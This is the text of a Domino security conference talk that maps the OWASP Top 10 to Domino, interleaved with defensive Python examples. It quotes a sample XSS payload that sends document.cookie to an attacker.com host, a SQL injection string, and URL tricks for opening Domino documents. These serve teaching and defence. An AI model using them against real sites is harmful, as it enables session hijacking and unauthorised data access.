MWLUG 2017
Moving Collaboration Forward
Can Domino Be Hacked?
Lessons We Can Learn From the
Security Community
Howard Greenberg
Andrew Pollack
Our Amazing Sponsors
Andrew Pollack
Northern Collaborative Technologies
• Administrator & Developer since version 2.0
• IBM Lotus Beacon Award Winner
• Services
– Security Review & Penetration Testing
– Site Performance & Security Reviews
– Expert Witness & Security Forensics
– Application Development
– Administrative Overhaul
• Products
– NCT Search
– NCT Compliance Search
– NCT Simple Sign On
– NCT SAML for Domino 7+
• Structural Firefighter
Howard Greenberg
• Been doing Notes/Domino since 1993
– Developer, Admin, Consultant, Instructor
• Co-founded TLCC in 1998
– Self-paced courses for Notes/Domino and XPages
• Security Certifications
– Certified Information Systems Auditor (CISA)
– Certified Information Security Manager (CISM)
• Certified Flight Instructor (CFI)
Session Goals
• Review the OWASP Top 10 Web Application
Security Issues
• Relate those to our Domino environments
HG
Why do I care?
• I have a firewall, no one can touch my Domino
environment!
HG
Reality
Vendors
Suppliers
Customers
Employees
HG
Major Breaches
• Target – 70MM customer accounts
– Stole logins from the HVAC subcontractor
• Via phishing email, then malware got installed
– Once in, pivoted to registers, installed malware
• Captured credit card information, then uploaded to hackers
– Lesson learned, segment networks, encrypt sensitive
data
Did the Firewall help?
https://www.sans.org/reading-room/whitepapers/casestudies/case-study-critical-controls-prevented-target-breach-35412
HG
OPM Breach
• Office of Personnel Management (US)
– Personal data on EVERY Federal employee
• Plus more...
• Phishing attack – got login data from a
contractor – put malware on admin server
• Lack of encryption on sensitive databases
https://www.wired.com/2016/10/inside-cyberattack-shocked-us-government/
HG
Who/What is OWASP
• “Open Web Application Security Project (OWASP) is a 501(c)(3)
worldwide not-for-profit charitable organization focused on
improving the security of software”
• Publishes a list of the 10 Most Critical Web Application Security
Risks – Widely Respected
– For each Risk it provides:
• A description
• Example vulnerabilities
• Example attacks
• Guidance on how to avoid
• References to OWASP and other related resource
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
HG
Top 10 for 2017 (Release Candidate)
• A1-Injection
• A2-Broken Authentication and Session Management
• A3-Cross-Site Scripting (XSS)
• A4-Broken Access Control
• A5-Security Misconfiguration
• A6-Sensitive Data Exposure
• A7-Insufficient Attack Protection
• A8-Cross-Site Request Forgery (CSRF)
• A9-Using Components with Known Vulnerabilities
• A10-Underprotected APIs
HG
https://www.owasp.org/index.php/Top_10_2017-Top_10
Sample of Information Published – Link to PDF
HG
A1 - Injection
The best way to find out if an application is vulnerable to injection is to verify
that all use of interpreters clearly separates untrusted data from the
command or query.
Typically this means SQL injection. Got any SQL code in your apps (accessing relational
data)? Like:
String query = "SELECT * FROM accounts WHERE custID='" +
request.getParameter("id") + "'";
The attacker modifies the ‘id’ parameter value in her browser to send: ' or
'1'='1. For example:
http://example.com/app/accountView?id=' or '1'='1
This changes the meaning of the query so that it returns all the records from the
accounts table. More dangerous attacks could modify data or even invoke
stored procedures.
HG
Domino Vulnerabilities – A1
• Got SQL code?
– Use SQL parameters instead of string concatenation
"SELECT * FROM accounts WHERE custID='" +
request.getParameter("id") + "'"
becomes
"SELECT * FROM accounts WHERE custID= ?"
– Scrub input
– Use prepared statements
HG
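To make the difference between the two queries on this slide concrete, here is an added example (not code from the presentation, and not Domino code) using Python's sqlite3 module as a stand-in for whatever relational database the application talks to. The accounts table and its rows are constructed sample data; the tampered id value is the one from the OWASP slide. The concatenated query returns every account, the parameterised one returns nothing, and the allow-list check shows the "scrub input" step as defence in depth.

```python
import sqlite3

def make_db():
    """Constructed sample data: a tiny in-memory accounts table standing in for the real one."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (custID TEXT, owner TEXT, balance INTEGER)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", [
        ("1001", "alice", 250),
        ("1002", "bob", 900),
        ("1003", "carol", 40),
    ])
    return conn

def lookup_concat(conn, cust_id):
    """The slide's 'before' pattern: user input glued straight into the SQL text.
    Whatever the user typed becomes part of the statement, quotes included."""
    query = "SELECT * FROM accounts WHERE custID='" + cust_id + "'"
    return conn.execute(query).fetchall()

def lookup_param(conn, cust_id):
    """The slide's 'after' pattern: a placeholder. The driver binds the value
    separately from the statement, so it can only ever be compared as data."""
    return conn.execute("SELECT * FROM accounts WHERE custID=?", (cust_id,)).fetchall()

def is_valid_cust_id(value):
    """'Scrub input' from the slide, done as an allow-list: customer IDs in this sample
    are short digit strings. Defence in depth only; the parameterised query is what
    actually prevents injection."""
    return value.isdigit() and len(value) <= 10

def demo():
    """Run both lookups with a normal id and with the tampered id from the slide."""
    conn = make_db()
    tampered = "' or '1'='1"   # the id value shown on the OWASP slide
    return {
        "normal_concat": len(lookup_concat(conn, "1002")),
        "tampered_concat": len(lookup_concat(conn, tampered)),   # every account comes back
        "normal_param": len(lookup_param(conn, "1002")),
        "tampered_param": len(lookup_param(conn, tampered)),     # no custID has that literal value
    }

if __name__ == "__main__":
    print(demo())
```

The same idea carries over to Java: `PreparedStatement` with `?` placeholders and `setString()` is the JDBC equivalent of the `?` form on the slide.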
Domino Vulnerabilities – A1
• Hack Domino URLs
– Switch from openDocument to editDocument
http://www.tlcc.com/mwlug/mwlug2017.nsf/topicThread.xsp?documentId=557D7B9B86441DFF85258154004A827A&action=openDocument
• Pivot to read all documents – open the default view
http://www.tlcc.com/mwlug/mwlug2017.nsf/$defaultview
• Use zero as the view name and open any document by
its ID
http://www.tlcc.com/mwlug/mwlug2017.nsf/0/557d7b9b86441dff85258154004a827a?EditDocument
Fix – use proper Readers/Authors fields
Block view access with $$ViewTemplateDefault
HG
A2-Broken Authentication and Session
Management - What is it?
• User authentication credentials aren’t properly protected
when stored using hashing or encryption.
• Credentials can be guessed or overwritten through weak
account management functions
• Session IDs are exposed in the URL
• Session IDs are vulnerable to session fixation attacks.
• Session IDs don’t timeout, or user sessions or
authentication tokens aren’t properly invalidated during
logout.
• Session IDs aren’t rotated after successful login.
• Passwords, session IDs, and other credentials are sent over
unencrypted connections.
AP
A2-Protecting Stored Credentials
• Domino is fairly good at this if you let it
– Use Minimum Password Requirements
– Protect your Domino Directory
– Don’t store a password file “just in case”
– Use the “Fewer Name Variants” option
• Beware of SSO Solutions – Including SAML
– You may be turning over all authentication
controls to some other system!
AP
A2 – Weak Management Practices
• Beware of password recovery processes
– How do you verify the person requesting the
password reset is really the person who should
have it? This can also be used to deny service.
– Any web site that can send you your old password
when you request it should not be trusted
AP
A2 – Session IDs in the URL
• While Domino doesn’t generally do this, some
administrators do this to avoid creating
Domino users, or to give specific user content
within applications based on URLs
– E.G. Urls that contain specific invoice numbers or
trouble ticket ids to send users to specific
documents
AP
A2 – Session “Fixation” Attacks
• Can your stored authentication token be captured
and re-used in Domino?
– Spoiler Alert: Yes, it can – and quite easily
• In Session based authentication the session token
is stored in a cookie.
• Anyone who can create web pages on your server
can capture this using a bit of javascript.
– Other servers – including non-Domino servers within
your domain may be able to capture this cookie as
well
AP
A2 – Preventing Domino “Fixation”
attacks on your Domino Servers
• Code review applications
• Follow XSS prevention best practices
• Change the default cookie domain path in
your session LTPA token documents
AP
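The slides make the point that the session token lives in a cookie, and that every host under the cookie's domain (Domino or not) receives it. Here is an added example (my own, not from the presentation and not a Domino API) that audits a Set-Cookie header the way a code review would: it parses the attributes and flags a token cookie that is missing Secure or HttpOnly, or whose Domain attribute is wider than the host that served it. The cookie values and hostnames are constructed; the cookie name LtpaToken is the one the slides refer to.

```python
def parse_set_cookie(header_value):
    """Split one Set-Cookie header value into (name, value, {attribute: value}).
    Flag attributes such as Secure and HttpOnly appear as keys with an empty value."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs

def audit_sso_cookie(header_value, served_host):
    """Return a list of findings for a session-token cookie served by `served_host`."""
    name, _value, attrs = parse_set_cookie(header_value)
    findings = []
    if "secure" not in attrs:
        findings.append("%s: missing Secure, the token can travel over plain http" % name)
    if "httponly" not in attrs:
        findings.append("%s: missing HttpOnly, page script can read the token" % name)
    domain = attrs.get("domain", "").lstrip(".").lower()
    if domain and domain != served_host.lower():
        # A parent-domain cookie is sent to every host under that domain, so every one of
        # those hosts must be trusted as much as the server that issued the token.
        findings.append("%s: Domain=%s is shared with every host under it, not just %s"
                        % (name, attrs["domain"], served_host))
    return findings

# Constructed sample headers (token values are placeholders, not real LTPA tokens).
WEAK_COOKIE = "LtpaToken=CONSTRUCTED-TOKEN-VALUE; Path=/; Domain=.example.com"
SHARED_COOKIE = "LtpaToken=CONSTRUCTED-TOKEN-VALUE; Path=/; Domain=.example.com; Secure; HttpOnly"
HOST_COOKIE = "LtpaToken=CONSTRUCTED-TOKEN-VALUE; Path=/; Domain=notes.example.com; Secure; HttpOnly"

if __name__ == "__main__":
    for cookie in (WEAK_COOKIE, SHARED_COOKIE, HOST_COOKIE):
        print(cookie)
        for finding in audit_sso_cookie(cookie, "notes.example.com"):
            print("  -", finding)
```

The third finding is deliberately a question rather than a verdict: a shared domain cookie is exactly what single sign-on needs, so the review question is whether every host that inherits it belongs on the trusted list.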
A2 – Passwords, session IDs, on
unencrypted connections
• There should no longer be any reason to allow
unencrypted http connections at all. Sorry.
It’s 2017. Stop doing this.
AP
A3 - Cross Site Scripting (XSS)
You are vulnerable to Server XSS if your server-side code uses user-supplied
input as part of the HTML output, and you don’t use context-sensitive
escaping to ensure it cannot run. If a web page uses JavaScript to dynamically
add attacker-controllable data to a page, you may have Client XSS. Ideally, you
would avoid sending attacker-controllable data to unsafe JavaScript APIs, but
escaping (and to a lesser extent) input validation can be used to make this
safe.
Example Attack Scenario
The application uses untrusted data in the construction of the following HTML
snippet without validation or escaping:
(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
The attacker modifies the ‘CC’ parameter in his browser to:
'><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>'.
This attack causes the victim’s session ID to be sent to the attacker’s website,
allowing the attacker to hijack the user’s current session.
HG
Domino Vulnerability – A3
• YES, any web application is!!!
• Any text input, especially rich text (converts to
link)
• Prevention
– Always sanitize any input
• Domino web – look for html tags, strip out
– Have to roll your own with LotusScript
– Note: CSJS is not an option!
• XPages have HTML Filters
HG
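The slides recommend stripping HTML tags from input, while the OWASP text above asks for context-sensitive escaping. This added example (mine, not from the presentation; the Domino-side equivalent would be written in LotusScript or use the XPages filter) takes the credit-card snippet from the OWASP slide and renders it three ways: unescaped, with tags stripped, and with attribute-context escaping. It shows why stripping alone is not enough in an attribute context: the leading quote in the slide's CC value still closes the attribute.

```python
import html
import re

# The CC parameter value from the OWASP slide, used here only as test input.
CC_PAYLOAD = ("'><script>document.location="
              "'http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'")

def render_unsafe(cc):
    """The slide's snippet: untrusted data dropped straight into an HTML attribute."""
    return "<input name='creditcard' type='TEXT' value='" + cc + "'>"

def strip_tags(text):
    """'Look for html tags, strip out': remove anything that looks like a tag."""
    return re.sub(r"<[^>]*>", "", text)

def render_stripped(cc):
    """Tag stripping only. The <script> element is gone, but the quote that closes the
    value attribute is still there, so the input is still outside the attribute."""
    return render_unsafe(strip_tags(cc))

def render_escaped(cc):
    """Context-sensitive escaping for a quoted attribute: html.escape with quote=True turns
    both quote characters and the angle brackets into entities, so the value cannot close
    the attribute or start an element. The browser still shows the user the original text."""
    return "<input name='creditcard' type='TEXT' value='" + html.escape(cc, quote=True) + "'>"

if __name__ == "__main__":
    for fn in (render_unsafe, render_stripped, render_escaped):
        print(fn.__name__, "->", fn(CC_PAYLOAD))
```

Escaping for the right context (attribute, element body, URL, JavaScript) is the rule; stripping is at best a secondary filter, because it has to anticipate every way a tag can be spelled while escaping only has to know where the data is being inserted.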
XPages HTML Filters
• XPages has built-in filtering
• It has to be turned on explicitly
– HTMLFilter – filters on output
– HTMLFilterIn – filters on saving
• Use acf as the option!
– identity does nothing, empty kills everything
– Turn it on for all rich text (at the server, application, or XPage level)
xsp.richtext.default.htmlfilter=acf
HG
More Information!
A4-Broken Access Control
• Not just ACL Settings – but includes them
– Maximum Internet Name & Password Access
– Anonymous & Default “No Access” on all databases
you don’t expect web users to access
– Obscurity is not Security – (See App Dev Practices)
AP
A5-Security Misconfiguration
• Don’t expose your operating system to the
internet.
• Turn off all services you don’t need
• Keep your Domino version fully up to date
– Tools like “Metasploit” know all about Domino
– Out of date servers can be hacked to a remote
command line in 30 seconds with menu driven
hacking tools
AP
A5 – Use Good HTTP Password
Management practices
• Assign HTTP Passwords even if you don’t use
them. This field will get filled in with garbage
if you do not.
– These are also used to attack your SMTP mail
handler
AP
A5 – Don’t Help the Hackers
• By default your server tells the world what
software you’re running.
It’s like you WANT to get hacked
AP
A5 – Don’t Help the Hackers!
• HTTPDisableServerHeader=1
• Then Get Fancy! Add your own SERVER header
AP
A5 - Set up SSL the right way
• Use TLS
• Use the right SSL settings
• Use a score check service to validate
AP
www.ssllabs.com/ssltest/index.html
A5 – Domino Web Server Settings
May need to modify ciphers available
Disable_SSLV3=1
SSL_USE_CLIENT_CIPHER_ORDER=1
A6- Sensitive Data Exposure
Am I vulnerable to Data Exposure? The first thing you have to
determine is which data is sensitive enough to require extra
protection. For example, passwords, credit card numbers, health
records, and personal information should be protected. For all such
data:
1. Is any of this data stored in clear text long term, including backups
of this data?
2. Is any of this data transmitted in clear text, internally or
externally? Internet traffic is especially dangerous.
3. Are any old / weak cryptographic algorithms used?
4. Are weak crypto keys generated, or is proper key management or
rotation missing?
5. Are any browser security directives or headers missing when
sensitive data is provided by / sent to the browser?
HG
Domino Vulnerability – A6
Know your data, what is sensitive - RISK ANALYSIS!
• HTTPS should be turned on/forced for anything that may be
sensitive - protect data in motion
• Store data in encrypted fields to protect data at rest
– Notes encryption (field level), now available in XPages as of FP8!
• Use TLS 1.2 only, older encryption is vulnerable
– Turn off SSLV3
• Passwords in names.nsf
– there is a setting to store them with stronger hashing; turn it on
• PCI - If your company takes credit cards, you are subject to
PCI
• PII - personal information, many rules for EU, states, etc.
HG
A7 - Insufficient Attack Protection
Am I Vulnerable to Attack?
Detecting, responding to, and blocking attacks makes
applications dramatically harder to exploit yet almost no
applications or APIs have such protection. Critical
vulnerabilities in both custom code and components are also
discovered all the time, yet organizations frequently take
weeks or even months to roll out new defenses.
It should be very obvious if attack detection and response
isn’t in place. Simply try manual attacks or run a scanner
against the application. The application or API should identify
the attacks, block any viable attacks, and provide details on
the attacker and characteristics of the attack. If you can’t
quickly roll out virtual and/or actual patches when a critical
vulnerability is discovered, you are left exposed to attack.
AP
A7-Insufficient Attack Protection
• Is anyone monitoring your HTTP and SMTP
logs to look for attacks?
• Does your company have an IDS (Intrusion
Detection System)?
• Fail2Ban – Poor Linux Admin’s IDS
AP
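"Is anyone monitoring your HTTP logs?" is the first question on this slide, and Fail2Ban is offered as the minimal answer. This added example (mine, not from the presentation and not Fail2Ban's code) shows the core of that idea as a few lines of Python: parse access-log lines, count 401 responses per client address, and flag an address that produces a threshold number of failures inside a short window. The log lines are constructed samples in Common Log Format; the addresses are documentation ranges and the timestamps are made up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Common Log Format: host ident user [timestamp] "request" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)')

# Constructed sample lines: one client hammering the login form, one normal user,
# one single failed request that should not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Aug/2017:14:02:01 +0000] "POST /names.nsf?Login HTTP/1.1" 401 0
203.0.113.7 - - [10/Aug/2017:14:02:03 +0000] "POST /names.nsf?Login HTTP/1.1" 401 0
203.0.113.7 - - [10/Aug/2017:14:02:06 +0000] "POST /names.nsf?Login HTTP/1.1" 401 0
198.51.100.4 - jdoe [10/Aug/2017:14:02:10 +0000] "GET /mail/jdoe.nsf HTTP/1.1" 200 5120
203.0.113.7 - - [10/Aug/2017:14:02:11 +0000] "POST /names.nsf?Login HTTP/1.1" 401 0
203.0.113.7 - - [10/Aug/2017:14:02:15 +0000] "POST /names.nsf?Login HTTP/1.1" 401 0
203.0.113.7 - - [10/Aug/2017:14:02:20 +0000] "POST /names.nsf?Login HTTP/1.1" 401 0
192.0.2.9 - - [10/Aug/2017:14:05:00 +0000] "GET /names.nsf?Open HTTP/1.1" 401 0
198.51.100.4 - jdoe [10/Aug/2017:14:06:30 +0000] "GET /mail/jdoe.nsf HTTP/1.1" 200 4880
"""

def parse_line(line):
    """Return a dict with ip, timestamp, request and status, or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, request, status, _size = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": ip, "when": when, "request": request, "status": int(status)}

def find_auth_bruteforce(lines, threshold=5, window=timedelta(minutes=10)):
    """Map each client address that produced `threshold` 401 responses inside `window`
    to its total number of failures. This is the rule a Fail2Ban jail would act on."""
    failures = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 401:
            failures[rec["ip"]].append(rec["when"])
    flagged = {}
    for ip, times in failures.items():
        times.sort()
        # Slide a window of `threshold` consecutive failures along the sorted timestamps.
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                flagged[ip] = len(times)
                break
    return flagged

if __name__ == "__main__":
    for ip, count in find_auth_bruteforce(SAMPLE_LOG.splitlines()).items():
        print("%s: %d failed logins, candidate for blocking" % (ip, count))
```

In production the same rule runs as a Fail2Ban filter regex plus a jail with `maxretry` and `findtime`; the point of writing it out is to see what the jail actually decides on, and to check that the log format your Domino server writes carries the status code and client address the rule needs.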
A8 - Cross-Site Request Forgery (CSRF)
Am I Vulnerable to CSRF?
To check whether an application is vulnerable, see if any links and
forms lack an unpredictable CSRF token. Without such a token,
attackers can forge malicious requests. An alternate defense is to
require the user to prove they intended to submit the request, such as
through reauthentication.
Focus on the links and forms that invoke state-changing functions,
since those are the most important CSRF targets. Multistep
transactions are not inherently immune. Also be aware that Server-
Side Request Forgery (SSRF) is also possible by tricking apps and APIs
into generating arbitrary HTTP requests.
Note that session cookies, source IP addresses, and other information
automatically sent by the browser don’t defend against CSRF since
they are included in the forged requests.
HG
Domino Vulnerabilities – A8
• Prevent your content from being rendered in an
iframe or frameset that you did not generate.
• Domino web admin is vulnerable, turn off!
• Domino frameset
– DominoValidateFramesetSRC=1 - make sure the
content in the frameset comes from the same
database
https://www-10.lotus.com/ldd/dominowiki.nsf/dx/DominoValidateFramesetSRC
• Set the header (note: required for PCI compliance)
http://www-01.ibm.com/support/docview.wss?uid=swg21568598
HG
A8 – X-Frame-Options Header
• Use the header “X-Frame-Options” to tell browsers not
to allow your page to be loaded in someone else’s
frame
– Frequently required by customer security audits
AP
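Two of the checks in this deck are about response headers: the A5 slides say to stop announcing the server software (HTTPDisableServerHeader=1, then send your own Server header), and the A8 slides say to send X-Frame-Options so the page cannot be framed elsewhere. The added example below (mine, not from the presentation, and not a Domino API) is a small audit function that parses a raw HTTP response head and reports both problems, run against a constructed "before" response and a constructed "after" response. The product-name list is an assumption of this example, not a Domino setting.

```python
import re

# Product names whose appearance in a Server header tells a scanner what to look up.
# This list is the example's own assumption; extend it for your environment.
PRODUCT_NAMES = ("lotus-domino", "domino", "apache", "nginx", "microsoft-iis")

def parse_headers(raw):
    """Parse a raw response head (status line followed by headers) into
    (status_line, {lower-cased name: value})."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        if key.strip():
            headers[key.strip().lower()] = value.strip()
    return lines[0], headers

def audit_headers(raw):
    """Return a list of findings: software disclosure in Server, and missing or
    ineffective X-Frame-Options."""
    _status, h = parse_headers(raw)
    findings = []
    server = h.get("server", "")
    if any(p in server.lower() for p in PRODUCT_NAMES) or re.search(r"\d", server):
        findings.append("Server header discloses software: %r" % server)
    xfo = h.get("x-frame-options", "").upper()
    if xfo not in ("DENY", "SAMEORIGIN"):
        findings.append("X-Frame-Options missing or not DENY/SAMEORIGIN (got %r)" % xfo)
    return findings

# Constructed sample responses: a default server that names itself and allows framing,
# and the same server after the notes.ini change plus a custom Server header.
BEFORE = "HTTP/1.1 200 OK\r\nServer: Lotus-Domino\r\nContent-Type: text/html\r\n"
AFTER = ("HTTP/1.1 200 OK\r\nServer: webserver\r\n"
         "X-Frame-Options: SAMEORIGIN\r\nContent-Type: text/html\r\n")

if __name__ == "__main__":
    for label, raw in (("before", BEFORE), ("after", AFTER)):
        print(label, audit_headers(raw) or ["no findings"])
```

Run the same function over a real response captured with curl -I (or a browser's network panel) after changing the server settings, and keep it in whatever check you run before each release so the headers do not silently disappear with the next upgrade.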
A9 - Using Components with Known
Vulnerabilities
• The challenge is to continuously monitor the components (both client-side
and server-side) you are using for new vulnerability reports. This
monitoring can be very difficult because vulnerability reports are not
standardized, making them hard to find and search for the details you
need (e.g., the exact component in a product family that has the
vulnerability). Worst of all, many vulnerabilities never get reported to
central clearinghouses like CVE and NVD.
• Determining if you are vulnerable requires searching these databases, as
well as keeping abreast of project mailing lists and announcements for
anything that might be a vulnerability. This process can be done manually,
or with automated tools. If a vulnerability in a component is discovered,
carefully evaluate whether you are actually vulnerable. Check to see if
your code uses the vulnerable part of the component and whether the
flaw could result in an impact you care about. Both checks can be difficult
to perform as vulnerability reports can be deliberately vague.
HG
Domino Vulnerabilities – A9
• What software is your application using? Does
that have vulnerabilities?
– JS libraries like jQuery, Select2
– Java libraries (pdf, JSON, credit card...)
• What software is IBM using? (Example Java
libraries, Apache struts, etc.)
– Example: Apache Struts vulnerability
– Be sure to keep the Domino JVM updated
– Interim fixes
– Latest Fix Pack
HG
A10 – Under-protected APIs
Am I Vulnerable to Attack?
Testing your APIs for vulnerabilities should be similar to testing the rest of
your application for vulnerabilities. All the different types of injection,
authentication, access control, encryption, configuration, and other issues
can exist in APIs just as in a traditional application.
However, because APIs are designed for use by programs (not humans) they
frequently lack a UI and also use complex protocols and complex data
structures. These factors can make security testing difficult. The use of
widely-used formats can help, such as Swagger (OpenAPI), REST, JSON, and
XML. Some frameworks like GWT and some RPC implementations use custom
formats. Some applications and APIs create their own protocol and data
formats, like WebSockets. The breadth and complexity of APIs make it difficult
to automate effective security testing, possibly leading to a false sense of
security.
Ultimately, knowing if your APIs are secure means carefully choosing a
strategy to test all defenses that matter.
HG
Domino Vulnerabilities – A10
• Know what is turned on in your applications
and server.
– Is Domino DAS turned on?
• REST access to a database
– XPages REST, agents that serve up REST data, etc.
• Do a Code review, understand what data these
might serve up and how much access is given.
HG
Closing
• Security is the responsibility of EVERYONE
• Especially those of us in IT, even without a
security job
– Developers have to ALWAYS design for security
– Admins have to ALWAYS plan and monitor to build
resilient systems
– Management has to provide the resources and
focus

Content Security Policy - Lessons learned at Yahoo
 
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentationJustin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub  - A case study of django web applications that are secur...Mr. Mohammed Aldoub  - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
 
IBM DataPower Weekly Webcast - The Value of Datapower Frameworks - 11.03.17
IBM DataPower Weekly Webcast - The Value of Datapower Frameworks - 11.03.17 IBM DataPower Weekly Webcast - The Value of Datapower Frameworks - 11.03.17
IBM DataPower Weekly Webcast - The Value of Datapower Frameworks - 11.03.17
 
From Monoliths to Services: Paying Your Technical Debt
From Monoliths to Services: Paying Your Technical DebtFrom Monoliths to Services: Paying Your Technical Debt
From Monoliths to Services: Paying Your Technical Debt
 
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
 
Challenges In Modern Application
Challenges In Modern ApplicationChallenges In Modern Application
Challenges In Modern Application
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
 

More from Howard Greenberg

January OpenNTF Webinar - Backup your Domino Server - New Options in V12
January OpenNTF Webinar - Backup your Domino Server - New Options in V12January OpenNTF Webinar - Backup your Domino Server - New Options in V12
January OpenNTF Webinar - Backup your Domino Server - New Options in V12Howard Greenberg
 
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...Howard Greenberg
 
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)Howard Greenberg
 
August OpenNTF Webinar - Git and GitHub Explained
August OpenNTF Webinar - Git and GitHub ExplainedAugust OpenNTF Webinar - Git and GitHub Explained
August OpenNTF Webinar - Git and GitHub ExplainedHoward Greenberg
 
July OpenNTF Webinar - HCL Presents Keep, a new API for Domino
July OpenNTF Webinar - HCL Presents Keep, a new API for DominoJuly OpenNTF Webinar - HCL Presents Keep, a new API for Domino
July OpenNTF Webinar - HCL Presents Keep, a new API for DominoHoward Greenberg
 
June OpenNTF Webinar - Domino V12 Certification Manager
June OpenNTF Webinar - Domino V12 Certification ManagerJune OpenNTF Webinar - Domino V12 Certification Manager
June OpenNTF Webinar - Domino V12 Certification ManagerHoward Greenberg
 
OpenNTF Webinar, March, 2021
OpenNTF Webinar, March, 2021OpenNTF Webinar, March, 2021
OpenNTF Webinar, March, 2021Howard Greenberg
 
February OpenNTF Webinar: Introduction to Ansible for Newbies
February OpenNTF Webinar: Introduction to Ansible for NewbiesFebruary OpenNTF Webinar: Introduction to Ansible for Newbies
February OpenNTF Webinar: Introduction to Ansible for NewbiesHoward Greenberg
 
January OpenNTF Webinar: 4D - Domino Docker Deep Dive
January OpenNTF Webinar: 4D - Domino Docker Deep DiveJanuary OpenNTF Webinar: 4D - Domino Docker Deep Dive
January OpenNTF Webinar: 4D - Domino Docker Deep DiveHoward Greenberg
 
December OpenNTF Webinar: The Volt MX LotusScript Toolkit
December OpenNTF Webinar: The Volt MX LotusScript ToolkitDecember OpenNTF Webinar: The Volt MX LotusScript Toolkit
December OpenNTF Webinar: The Volt MX LotusScript ToolkitHoward Greenberg
 
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1Howard Greenberg
 
OpenNTF Webinar, October 2020
OpenNTF Webinar, October 2020OpenNTF Webinar, October 2020
OpenNTF Webinar, October 2020Howard Greenberg
 
August Webinar - Water Cooler Talks: A Look into a Developer's Workbench
August Webinar - Water Cooler Talks: A Look into a Developer's WorkbenchAugust Webinar - Water Cooler Talks: A Look into a Developer's Workbench
August Webinar - Water Cooler Talks: A Look into a Developer's WorkbenchHoward Greenberg
 
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!Howard Greenberg
 
OpenNTF Webinar, May 19, 2020
OpenNTF Webinar, May 19, 2020OpenNTF Webinar, May 19, 2020
OpenNTF Webinar, May 19, 2020Howard Greenberg
 
Dev112 let's calendar that
Dev112   let's calendar thatDev112   let's calendar that
Dev112 let's calendar thatHoward Greenberg
 
MWLUG Session- AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...
MWLUG Session-  AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...MWLUG Session-  AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...
MWLUG Session- AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...Howard Greenberg
 
Connect 2016-Move Your XPages Applications to the Fast Lane
Connect 2016-Move Your XPages Applications to the Fast LaneConnect 2016-Move Your XPages Applications to the Fast Lane
Connect 2016-Move Your XPages Applications to the Fast LaneHoward Greenberg
 

More from Howard Greenberg (20)

January OpenNTF Webinar - Backup your Domino Server - New Options in V12
January OpenNTF Webinar - Backup your Domino Server - New Options in V12January OpenNTF Webinar - Backup your Domino Server - New Options in V12
January OpenNTF Webinar - Backup your Domino Server - New Options in V12
 
BRPA November Meeting
BRPA November MeetingBRPA November Meeting
BRPA November Meeting
 
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...
 
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)
 
August OpenNTF Webinar - Git and GitHub Explained
August OpenNTF Webinar - Git and GitHub ExplainedAugust OpenNTF Webinar - Git and GitHub Explained
